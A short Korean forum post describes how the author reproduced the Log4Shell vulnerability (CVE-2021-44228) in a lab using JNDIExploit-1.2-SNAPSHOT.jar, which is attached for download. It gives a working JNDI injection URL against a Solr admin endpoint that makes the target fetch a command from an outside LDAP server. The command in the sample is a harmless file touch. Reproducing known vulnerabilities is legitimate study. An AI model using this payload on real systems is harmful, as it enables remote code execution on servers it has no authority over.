메뉴 건너뛰기

pds

log4j 취약점 POC 를 위한 LDAP jar

suritam92022.09.16 10:57조회 수 44댓글 0

  • 1
    • 글자 크기

log4j 취약점 설명이 잘 되어 있는 페이지가 있다.

 

 

https://www.kisec.com/rsrh_rpt_det.do?id=783

 

CVE-2021-44228 을 재현하기 위해 해당 페이지를 참고 했다.

 

Attacker와 Butt(victim)만 있으면 재현 가능한 취약점에 비해 Communicator 까지 필요한 POC라서 이해하는데 시간이 많이 소요된다.

 

JNDIExploit-1.2-SNAPSHOT.jar 를 배포하던 저장소의 계정이 삭제되어 해당 파일을 입수하는데 시간이 걸렸다.

 

해당 JAR만 잘 실행하면 ldap을 통해 공격 코드를 전송할 수 있다.

 

한 가지 더 주의할 점은 base64 encoding 으로 보내고 decoding 시켜주는 경로를 사용해야 한다는 점이다.

 

웹 브라우저로도 테스트 가능하며 ldap은 같은 경로에서 java로 실행하여 성공하였다.

 

 

http://취약환경이있는서버:8983/solr/admin/cores?action=${jndi:ldap://ldap을실행한서버:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9jd2UtMjAyMS00NDIyOA==}

 

touch /tmp/cwe-2021-44228 는 base64 encoding한 코드이다.

 

  • 1
    • 글자 크기
[Flash 사용불가] Xpresseditor + AXISJ AXUpload5(HTML5) 에디터 (by suritam9)

댓글 달기

첨부 (1)
JNDIExploit.v1.2.zip
34.26MB / Download 27
위로